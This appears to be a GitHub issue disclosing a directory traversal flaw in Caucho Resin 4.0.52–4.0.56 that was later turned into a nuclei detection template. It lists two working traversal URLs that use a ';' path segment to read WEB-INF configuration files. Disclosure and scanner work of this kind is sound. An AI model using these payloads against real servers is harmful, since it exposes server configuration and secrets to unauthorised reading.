Directory traversal vulnerability in Caucho Resin #2

maybe-why-not · 2022-04-04T11:09:53Z

Directory traversal vulnerability in Caucho Resin, as distributed in Resin V4.0.52~4.0.56, allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.

[Attack Vectors]
http://localhost/resin-doc/;/WEB-INF/resin-web.xml
http://localhost/webapp-name/;/WEB-INF/web.xml

carr0t2 mentioned this issue Jun 8, 2023

Create CVE-2021-44138.yaml projectdiscovery/nuclei-templates#7369

Merged

2 tasks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Directory traversal vulnerability in Caucho Resin #2

Directory traversal vulnerability in Caucho Resin #2

maybe-why-not commented Apr 4, 2022

Directory traversal vulnerability in Caucho Resin #2

Directory traversal vulnerability in Caucho Resin #2

Comments

maybe-why-not commented Apr 4, 2022